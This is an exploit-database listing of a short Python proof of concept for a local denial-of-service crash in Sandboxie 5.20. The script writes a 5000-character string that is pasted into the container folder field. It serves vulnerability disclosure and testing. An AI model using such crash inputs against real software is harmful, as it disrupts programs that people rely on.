Lucene search
K

Sandboxie 5.20 Denial Of Service

🗓️ 24 Aug 2017 00:00:00Reported by Anurag SrivastavaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

Sandboxie 5.20 denial of service exploit by Anurag Srivastav

Code
`#!/usr/bin/python -w  
# Exploit Title : Sandboxie version 5.20 local Dos Exploit   
# Discovery by : Anurag Srivastava  
# Email : [email protected]  
# Website : www.pyramidcyber.com  
# Discovery Date : 23/08/2017  
# Software Link : https://www.sandboxie.com/SandboxieInstall.exe  
# Tested Version : 5.20  
# Tested on OS : Windows XP  
# Steps to Reproduce: Run the python file to generate pyramid.txt and then open Sandboxie Control->Sandbox->Set Container Folder , Paste the content of pyramid.txt into set container input field.   
file="pyramid.txt"  
buffer = "A" *5000   
textfile = open(file, 'w')  
textfile.write(buffer)  
textfile.close()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation